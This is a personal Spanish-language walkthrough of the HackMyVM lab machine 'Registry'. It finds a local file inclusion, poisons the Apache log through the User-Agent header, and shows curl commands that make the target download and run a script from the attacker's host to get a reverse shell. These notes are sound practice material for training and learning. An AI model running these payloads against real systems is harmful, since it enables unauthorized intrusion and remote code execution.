Notas de Luis

Máquina REGISTRY

Hacemos un escaneo con nmap:

Y esta es la página web:

Si hacemos clic en sign up, vemos que se nos cambia la URL donde se llama a un fichero llamado default.php, lo que nos da una pista de un posible local file inclusion:

Hay una herramienta para automatizar ataques de local file inclusion en el siguiente repositorio:

https://github.com/kvlx-alt/LFI-Scanner

La bajamos y probamos:

Y nos pide la url, donde la pegaremos justo en el momento antes que cargue el default.php:

Y vemos que nos pide un diccionario para hacer ataques de fuerza bruta, por lo que nos bajamos uno de github:

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt

Una vez bajado, lo cargamos en la herramienta y nos encuentra el path vulnerable:

http://192.168.0.42/index.php?page=/etc/passwd

Lo pegamos en la web y vemos que funciona:

Lo interesante es que una vez pudiendo ver archivos del sistema, podemos ver también el archivo access.log de apache, por lo que es posible que estemos ante un log poisonning:

http://192.168.0.42/index.php?page=/var/log/apache2/access.log

Ejecutamos un comando de forma remota con curl:

curl -s -X GET 'http://192.168.0.42/' -H "User-Agent: <?php system('whoami'); ?>"

Y vemos que se ejecutó correctamente en la máquina víctima:

Por lo que ahora ingresamos código para enviarnos una reverse shell, de tal forma que creamos el script con el payload:

Nos montamos un servidor http con python compartiendo este script:

Y ejecutamos los siguientes comandos:

curl -s -X GET 'http://192.168.0.42' -H "User-Agent: <?php system('wget http://10.8.100.91/pwned.sh'); ?>"
 
curl -s -X GET 'http://192.168.0.42' -H "User-Agent: <?php system('chmod 777 pwned.sh'); ?>"
 
curl -s -X GET 'http://192.168.0.42' -H "User-Agent: <?php system('bash pwned.sh'); ?>"

Y recibimos la reverse shell:

Una vez dentro, vemos que tenemos 3 carpetas pero no tenemos permiso para acceder a ninguna de ellas:

computing/hacking/ctf/hackmyvm/maquina_registry.txt · Última modificación: por 127.0.0.1